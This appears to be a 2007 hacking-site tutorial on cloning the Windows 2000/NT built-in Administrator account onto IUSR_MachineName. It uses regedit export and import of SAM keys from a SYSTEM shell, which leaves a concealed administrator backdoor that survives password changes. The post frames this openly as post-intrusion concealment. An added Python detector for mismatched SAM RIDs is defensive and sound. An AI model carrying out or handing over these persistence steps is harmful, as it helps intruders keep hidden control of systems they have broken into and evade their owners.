Teaching you to clone the administrator account on a system - Vulnerability Warning - Heiba Security Network

ID MYHACK58:62200713851
Type myhack58
Reporter Anonymous
Modified 2007-01-19T00:00:00


I often see people who, after breaking into a Windows 2000 or Windows NT machine, grandly create a user in the Administrators group, as if the administrator were never going to look. Today, going against my earlier way of thinking, I will share something that works a bit like a rootkit. These steps could also be scripted, but I have not written a script. OK, show time now.

First, a concept everyone should know: on Windows 2000 and Windows NT the default Administrator account's SID always ends in the fixed relative identifier 500 (0x1F4). We can therefore take an account that already exists on the machine and clone the RID-500 account into it. Here we pick IUSR_MachineName; we choose this account to improve concealment. Of course any user can be cloned with the method below, but this user is the most common. The test environment is Windows 2000 Server.

Get a CMD shell running as SYSTEM (see http://www.sometips.com/tips/scripts/173.htm or use Http://www.sometips.com/soft/psu.exe), then in that CMD shell run:

regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4

This exports the account information of the RID-500 Administrator. Now edit the file adam.reg: its third line reads [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4], and the trailing '1F4' must be changed to the RID of IUSR_MachineName. On most machines that user's RID is 0x3E9; if IIS was not installed during the initial setup and you created an account yourself before installing IIS, it may not be this value. After changing '1F4' to '3E9' in the reg file, run:

regedit /s adam.reg

to import the reg file, then run:

net user IUSR_MachineName Sometips

This sets the password of IUSR_MachineName. It is best to use a 14-character password; the more it looks like a real IUSR_MachineName password, the better.

With that, we have the same desktop and the same profile as the default Administrator. Moreover, when we run net localgroup administrators, look at the result:

C:\>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

--------------------------------------------------------------------
Administrator
The command completed successfully.

Now look at the output of user2sid:

C:\>user2sid Administrator

S-1-5-21-1004336348-1078145449-854245398-500

Number of subauthorities is 5
The Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

C:\>user2sid iusr_machinename

S-1-5-21-1004336348-1078145449-854245398-1001

Number of subauthorities is 5
The Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser
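The user2sid output above shows why group enumeration misses the clone: the name index still reports the account's own RID (1001), while the registry data copied under that key still belongs to RID 500. A defender can look for exactly that inconsistency in the SAM. The following is an added example, not code from the article; it assumes the publicly documented layout of a user's F value, in which the account's RID is stored as a little-endian DWORD at offset 0x30, and it runs against a constructed sample set of keys (read_live_sam is the Windows-only, SYSTEM-privileged path to real data).

```python
# Added example, not from the article: detect SAM account cloning by checking
# each user's "F" value. Assumed layout (public SAM documentation): 8-byte
# header, five FILETIMEs, then the account's own RID as a LE DWORD at 0x30.
import struct

RID_OFFSET = 0x30   # assumed offset of the RID DWORD inside the F value
ADMIN_RID = 0x1F4   # 500: fixed RID of the built-in Administrator

def f_value_rid(f_blob: bytes) -> int:
    """RID stored inside a user's F value (raises on truncated data)."""
    if len(f_blob) < RID_OFFSET + 4:
        raise ValueError("F value too short to contain the RID field")
    return struct.unpack_from("<I", f_blob, RID_OFFSET)[0]

def find_cloned_accounts(user_keys: dict) -> list:
    """Map of SAM key name (hex RID, e.g. '000003E9') -> F blob; returns
    (key_name, key_rid, embedded_rid) wherever the two RIDs disagree."""
    hits = []
    for name, blob in user_keys.items():
        key_rid, inner = int(name, 16), f_value_rid(blob)
        if inner != key_rid:        # copied Administrator key under another RID
            hits.append((name, key_rid, inner))
    return hits

def read_live_sam() -> dict:
    """Windows only: read every RID key under HKLM\\SAM (needs SYSTEM rights)."""
    import winreg
    keys, i = {}, 0
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SAM\SAM\Domains\Account\Users") as users:
        while True:
            try:
                sub = winreg.EnumKey(users, i)
            except OSError:            # no more subkeys
                return keys
            i += 1
            if sub.upper() != "NAMES":  # skip the name index, keep RID keys
                with winreg.OpenKey(users, sub) as k:
                    keys[sub] = winreg.QueryValueEx(k, "F")[0]

def make_f(rid: int) -> bytes:
    """Constructed sample F blob: zero-filled layout with only the RID set."""
    blob = bytearray(0x50)
    struct.pack_into("<I", blob, RID_OFFSET, rid)
    return bytes(blob)

SAMPLE_SAM = {                      # constructed, not from a real machine
    "000001F4": make_f(ADMIN_RID),  # Administrator: consistent
    "000003E8": make_f(0x3E8),      # ordinary user, RID 1000: consistent
    "000003E9": make_f(ADMIN_RID),  # IUSR clone: key says 1001, F says 500
}
```

On a real host, `find_cloned_accounts(read_live_sam())` returns the same kind of tuples for any key whose F value was imported from another RID.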

I think even an administrator would not see anything different... and no matter what password the administrator changes to, I can still log in with IUSR_MachineName's password Sometips... (unless some hero-level administrator likes to rename IUSR_MachineName to something else.)